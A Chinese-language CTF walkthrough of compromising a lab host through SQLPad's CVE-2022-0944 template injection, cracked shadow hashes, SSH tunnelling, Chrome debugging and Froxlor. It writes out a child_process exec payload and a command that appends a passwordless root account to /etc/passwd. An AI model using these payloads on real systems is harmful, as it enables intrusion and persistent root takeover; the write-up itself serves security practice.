信息收集

端口掃描

使用nmap進行端口探測，發現存在21、22、80端口開放。

FTP未授權訪問

嘗試21端口未授權訪問。

目錄爆破

使用工具進行爆破目錄。

未發現有用的路徑，接著嘗試訪問80端口。

Web網站

訪問主頁

發現存在一個數據庫調用頁面

右上角有一個與連接交互的菜單：

Google搜索

使用google搜索cve漏洞。

漏洞利用

CVE-2022-0944

漏洞簡介

Description
Please enter a description of the vulnerability.Proof of Concept
Run a local docker instance
sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
Navigate to http://localhost:3000/
Click on Connections->Add connection
Choose MySQL as the driver
Input the following payload into the Database form field
{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
Execute the following command to confirm the /tmp/pwn file was created in the container filesystem
sudo docker exec -it sqlpad cat /tmp/pwn
Impact
An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.

遠程代碼執行

使用nc監聽。

接著使用poc進行攻擊，即可獲取webshell。

內網滲透

Docker

發現運行在一個docker容器里面。

發現有兩個用戶的主目錄位于/home

恢復密碼

將查到的密碼保存之后，進行恢復。

root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b. michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

接著進行hash爆破，成功獲取用戶密碼。

SSH登錄

接著使用該密碼進行登錄ssh。

登錄之后，獲取user.txt.

發現michael 用戶無法運行sudo

尋找默認文件

查看默認配置

發現存在8000端口。

隧道搭建

接著使用ssh進行端口轉發。

然后訪問8000端口。

發現一個登錄頁面。

抓包嘗試。

Chrome 調試

查找調試端口

在chrome進程中，它使用 將調試端口設置為 0。--remote-debugging-port=0這意味著每次啟動時它都會是一個隨機的高端口。我將檢查netstat：

獲取密碼

單擊第一行的“檢查”將啟動一個窗口，顯示開發工具中的活動。

CVE-2024-34070

漏洞簡介：

Froxlor 是一款開源服務器管理軟件。在 2.1.9 之前，Froxlor 應用程序的失敗登錄嘗試日志記錄功能中發現了一個存儲盲跨站點腳本 (XSS) 漏洞。未經身份驗證的用戶可以在登錄嘗試時在 loginname 參數中注入惡意腳本，然后當管理員在系統日志中查看時，該腳本將被執行。通過利用此漏洞，攻擊者可以執行各種惡意操作，例如在管理員不知情或未經同意的情況下強迫管理員執行操作。例如，攻擊者可以強迫管理員添加由攻擊者控制的新管理員，從而使攻擊者完全控制應用程序。此漏洞已在 2.1.9 中修復。

發現是PHP8.1.2

權限提升

PHP FPM遠程代碼執行

發現有一處功能點可執行命令

寫入反彈shell腳本。

echo "echo '0dayhp::0:0:0test1:/root:/bin/bash' >> /etc/passwd">test.sh

然后保存之后，運行。

獲取root權限

成功獲取root權限